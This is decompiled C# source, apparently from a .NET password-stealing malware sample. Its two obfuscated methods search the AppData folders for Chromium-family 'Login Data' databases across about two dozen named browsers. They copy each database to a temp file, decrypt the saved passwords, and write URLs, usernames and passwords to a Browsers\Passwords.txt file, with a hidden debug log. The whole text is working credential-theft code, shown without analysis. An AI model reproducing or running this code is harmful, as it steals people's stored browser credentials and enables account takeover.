// Token: 0x060000EC RID: 236 RVA: 0x00006FC0 File Offset: 0x000051C0
private static void AhtOfHyXu6()
{
StreamWriter streamWriter = new StreamWriter("C:\\ProgramData\\debug.txt", true);
try
{
Directory.CreateDirectory(Program.path + "\\Browsers");
List <LogPassData> list = new List <LogPassData>();
List <string> list2 = new List <string>();
List <string> list3 = new List <string>
{
Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
};
List <string> list4 = new List <string>();
foreach (string path in list3)
{
try
{
list4.AddRange(Directory.EnumerateDirectories(path));
}
catch
{
}
}
foreach (string path2 in list4)
{
try
{
list2.AddRange(Directory.EnumerateFiles(path2, "Login *", SearchOption.AllDirectories));
list2.AddRange(Directory.GetFiles(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Login Data", SearchOption.AllDirectories));
list2.AddRange(Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories));
string[] files = Directory.GetFiles(path2, "Login Data", SearchOption.AllDirectories);
foreach (string text in files)
{
streamWriter.WriteLine("+" + text);
streamWriter.WriteLine("[Browsers] " + text);
try
{
if (File.Exists(text))
{
string text2 = "Unknown (" + text + ")";
if (text.Contains("Chrome"))
{
text2 = "Google Chrome";
}
if (text.Contains("Yandex"))
{
text2 = "Yandex Browser";
}
if (text.Contains("Orbitum"))
{
text2 = "Orbitum Browser";
}
if (text.Contains("Opera"))
{
text2 = "Opera Browser";
}
if (text.Contains("Amigo"))
{
text2 = "Amigo Browser";
}
if (text.Contains("Torch"))
{
text2 = "Torch Browser";
}
if (text.Contains("Comodo"))
{
text2 = "Comodo Browser";
}
if (text.Contains("CentBrowser"))
{
text2 = "CentBrowser";
}
if (text.Contains("Go!"))
{
text2 = "Go!";
}
if (text.Contains("uCozMedia"))
{
text2 = "uCozMedia";
}
if (text.Contains("Rockmelt"))
{
text2 = "Rockmelt";
}
if (text.Contains("Sleipnir"))
{
text2 = "Sleipnir";
}
if (text.Contains("SRWare Iron"))
{
text2 = "SRWare Iron";
}
if (text.Contains("Vivaldi"))
{
text2 = "Vivaldi";
}
if (text.Contains("Sputnik"))
{
text2 = "Sputnik";
}
if (text.Contains("Maxthon"))
{
text2 = "Maxthon";
}
if (text.Contains("AcWebBrowser"))
{
text2 = "AcWebBrowser";
}
if (text.Contains("Epic Browser"))
{
text2 = "Epic Browser";
}
if (text.Contains("MapleStudio"))
{
text2 = "MapleStudio";
}
if (text.Contains("BlackHawk"))
{
text2 = "BlackHawk";
}
if (text.Contains("Flock"))
{
text2 = "Flock";
}
if (text.Contains("CoolNovo"))
{
text2 = "CoolNovo";
}
if (text.Contains("Baidu Spark"))
{
text2 = "Baidu Spark";
}
if (text.Contains("Titan Browser"))
{
text2 = "Titan Browser";
}
try
{
streamWriter.WriteLine("[Browsers] Try get " + text2 + " / " + text);
string text3 = Path.GetTempPath() + "/" + Class6.smethod_2() + ".fv";
if (File.Exists(text3))
{
File.Delete(text3);
}
File.Copy(text, text3, true);
Class7 @class = new Class7(text3);
if ([email protected]_4("logins"))
{
break;
}
int num = 0;
for (;;)
{
try
{
if (num >= @class.method_1())
{
break;
}
try
{
string text4 = string.Empty;
try
{
text4 = Encoding.UTF8.GetString(Class2.smethod_1(Encoding.Default.GetBytes(@class.method_0(num, 5)), null));
}
catch (Exception)
{
}
if (text4 != "")
{
LogPassData item = new LogPassData
{
Url = @class.method_0(num, 1).Replace("https://", "").Replace("http://", ""),
Login = @class.method_0(num, 3),
Password = text4,
Program = text2
};
list.Add(item);
streamWriter.WriteLine("[Browsers] Added to passwords / " + text2);
}
}
catch (Exception)
{
}
num++;
}
catch
{
}
}
File.Delete(text3);
}
catch
{
}
}
}
catch (Exception ex)
{
streamWriter.WriteLine("ERROR / " + text + " / - " + ex.ToString());
}
}
}
catch
{
}
}
Environment.GetEnvironmentVariable("LocalAppData");
string text5 = "";
streamWriter.WriteLine("[Browsers] Domain detect");
foreach (LogPassData logPassData in list)
{
text5 += logPassData.ToString();
try
{
string text6 = logPassData.Url.Contains("/") ? logPassData.Url.Split(new char[]
{
'/'
})[0] : logPassData.Url;
if (!Class10.string_10.Contains(text6))
{
Class10.string_10 = Class10.string_10 + text6 + ";";
}
}
catch (Exception value)
{
Console.Write(value);
}
}
File.WriteAllText(Program.path + "\\Browsers\\Passwords.txt", (text5 != null) ? (text5 + "\n――――――――――――――――――――――――――――――――――――――――――――") : "");
streamWriter.WriteLine("[Browsers] Writed to file...");
Class10.string_0 = list.Count.ToString();
streamWriter.WriteLine("[Browsers] Counters (exit)");
}
catch (Exception ex2)
{
streamWriter.WriteLine(ex2.ToString());
}
streamWriter.Close();
}
private static void smethod_5()
{
Directory.CreateDirectory(Program.path + "\\Browsers\\Cookies");
List <LogPassData> logPassDataList = new List <LogPassData>();
List <string> stringList1 = new List <string>();
List <string> stringList2 = new List <string>();
stringList2.Add(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData));
stringList2.Add(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData));
List <string> stringList3 = new List <string>();
foreach (string path in stringList2)
{
try
{
stringList3.AddRange(Directory.EnumerateDirectories(path));
}
catch
{
}
}
using (List <string> .Enumerator enumerator = stringList3.GetEnumerator())
{
label_81:
while (enumerator.MoveNext())
{
string current = enumerator.Current;
try
{
string[] files = Directory.GetFiles(current, "Login Data", SearchOption.AllDirectories);
int index = 0;
while (true)
{
if (index < files.Length)
{
string str1 = files[index];
try
{
if (File.Exists(str1))
{
string str2 = "Unknown (" + str1 + ")";
if (str1.Contains("Chrome"))
{
str2 = "Google Chrome";
}
if (str1.Contains("Yandex"))
{
str2 = "Yandex Browser";
}
if (str1.Contains("Orbitum"))
{
str2 = "Orbitum Browser";
}
if (str1.Contains("Opera"))
{
str2 = "Opera Browser";
}
if (str1.Contains("Amigo"))
{
str2 = "Amigo Browser";
}
if (str1.Contains("Torch"))
{
str2 = "Torch Browser";
}
if (str1.Contains("Comodo"))
{
str2 = "Comodo Browser";
}
if (str1.Contains("CentBrowser"))
{
str2 = "CentBrowser";
}
if (str1.Contains("Go!"))
{
str2 = "Go!";
}
if (str1.Contains("uCozMedia"))
{
str2 = "uCozMedia";
}
if (str1.Contains("Rockmelt"))
{
str2 = "Rockmelt";
}
if (str1.Contains("Sleipnir"))
{
str2 = "Sleipnir";
}
if (str1.Contains("SRWare Iron"))
{
str2 = "SRWare Iron";
}
if (str1.Contains("Vivaldi"))
{
str2 = "Vivaldi";
}
if (str1.Contains("Sputnik"))
{
str2 = "Sputnik";
}
if (str1.Contains("Maxthon"))
{
str2 = "Maxthon";
}
if (str1.Contains("AcWebBrowser"))
{
str2 = "AcWebBrowser";
}
if (str1.Contains("Epic Browser"))
{
str2 = "Epic Browser";
}
if (str1.Contains("MapleStudio"))
{
str2 = "MapleStudio";
}
if (str1.Contains("BlackHawk"))
{
str2 = "BlackHawk";
}
if (str1.Contains("Flock"))
{
str2 = "Flock";
}
if (str1.Contains("CoolNovo"))
{
str2 = "CoolNovo";
}
if (str1.Contains("Baidu Spark"))
{
str2 = "Baidu Spark";
}
if (str1.Contains("Titan Browser"))
{
str2 = "Titan Browser";
}
try
{
string str3 = Path.GetTempPath() + "/" + Class4.smethod_2() + ".fv";
if (File.Exists(str3))
{
File.Delete(str3);
}
File.Copy(str1, str3, true);
Class5 class5 = new Class5(str3);
if (class5.method_6("logins"))
{
int int_0 = 0;
while (true)
{
try
{
for (; int_0 < class5.method_2(); ++int_0)
{
try
{
string empty = string.Empty;
try
{
empty = Encoding.UTF8.GetString(Class1.smethod_1(Encoding.Default.GetBytes(class5.method_3(int_0, 5)), (byte[])null));
}
catch (Exception ex)
{
}
if (empty != "")
{
LogPassData logPassData = new LogPassData()
{
Url = class5.method_3(int_0, 1).Replace("https://", "").Replace("http://", ""),
Login = class5.method_3(int_0, 3),
Password = empty,
Program = str2
};
logPassDataList.Add(logPassData);
}
}
catch (Exception ex)
{
}
}
break;
}
catch
{
}
}
File.Delete(str3);
}
else
{
goto label_81;
}
}
catch
{
}
}
}
catch (Exception ex)
{
}
++index;
}
else
{
goto label_81;
}
}
}
catch
{
}
}
}
Environment.GetEnvironmentVariable("LocalAppData");
string[] array = stringList1.ToArray();
for (int index = 0; index < array.Length; ++index)
{
if (File.Exists(array[index]))
{
string str1 = "Unknown (" + array[index] + ")";
if (array[index].Contains("Chrome"))
{
str1 = "Google Chrome";
}
if (array[index].Contains("Yandex"))
{
str1 = "Yandex Browser";
}
if (array[index].Contains("Orbitum"))
{
str1 = "Orbitum Browser";
}
if (array[index].Contains("Opera"))
{
str1 = "Opera Browser";
}
if (array[index].Contains("Amigo"))
{
str1 = "Amigo Browser";
}
if (array[index].Contains("Torch"))
{
str1 = "Torch Browser";
}
if (array[index].Contains("Comodo"))
{
str1 = "Comodo Browser";
}
if (array[index].Contains("CentBrowser"))
{
str1 = "CentBrowser";
}
if (array[index].Contains("Go!"))
{
str1 = "Go!";
}
if (array[index].Contains("uCozMedia"))
{
str1 = "uCozMedia";
}
if (array[index].Contains("Rockmelt"))
{
str1 = "Rockmelt";
}
if (array[index].Contains("Sleipnir"))
{
str1 = "Sleipnir";
}
if (array[index].Contains("SRWare Iron"))
{
str1 = "SRWare Iron";
}
if (array[index].Contains("Vivaldi"))
{
str1 = "Vivaldi";
}
if (array[index].Contains("Sputnik"))
{
str1 = "Sputnik";
}
if (array[index].Contains("Maxthon"))
{
str1 = "Maxthon";
}
if (array[index].Contains("AcWebBrowser"))
{
str1 = "AcWebBrowser";
}
if (array[index].Contains("Epic Browser"))
{
str1 = "Epic Browser";
}
if (array[index].Contains("MapleStudio"))
{
str1 = "MapleStudio";
}
if (array[index].Contains("BlackHawk"))
{
str1 = "BlackHawk";
}
if (array[index].Contains("Flock"))
{
str1 = "Flock";
}
if (array[index].Contains("CoolNovo"))
{
str1 = "CoolNovo";
}
if (array[index].Contains("Baidu Spark"))
{
str1 = "Baidu Spark";
}
if (array[index].Contains("Titan Browser"))
{
str1 = "Titan Browser";
}
try
{
string str2 = Path.GetTempPath() + "/" + Class4.smethod_2() + ".fv";
if (File.Exists(str2))
{
File.Delete(str2);
}
File.Copy(array[index], str2, true);
Class5 class5 = new Class5(str2);
if (class5.method_6("logins"))
{
int int_0 = 0;
while (true)
{
try
{
for (; int_0 < class5.method_2(); ++int_0)
{
try
{
string empty = string.Empty;
try
{
empty = Encoding.UTF8.GetString(Class1.smethod_1(Encoding.Default.GetBytes(class5.method_3(int_0, 5)), (byte[])null));
}
catch (Exception ex)
{
}
if (empty != "")
{
LogPassData logPassData = new LogPassData()
{
Url = class5.method_3(int_0, 1).Replace("https://", "").Replace("http://", ""),
Login = class5.method_3(int_0, 3),
Password = empty,
Program = str1
};
logPassDataList.Add(logPassData);
}
}
catch (Exception ex)
{
}
}
break;
}
catch
{
}
}
File.Delete(str2);
}
else
{
break;
}
}
catch
{
}
}
}
string str4 = "";
foreach (LogPassData logPassData in logPassDataList)
{
str4 += logPassData.ToString();
try
{
string url;
if (!logPassData.Url.Contains("/"))
{
url = logPassData.Url;
}
else
{
url = logPassData.Url.Split('/')[0];
}
string str1 = url;
if (!Class7.string_10.Contains(str1))
{
if (Program.domaindetect.Contains(str1))
{
Class7.string_10 = Class7.string_10 + str1 + ";";
}
}
}
catch (Exception ex)
{
Console.Write((object)ex);
}
}
File.WriteAllText(Program.path + "\\Browsers\\Passwords.txt", str4 != null ? str4 + "\n――――――――――――――――――――――――――――――――――――――――――――" : "");
Class7.string_0 = logPassDataList.Count.ToString();
}
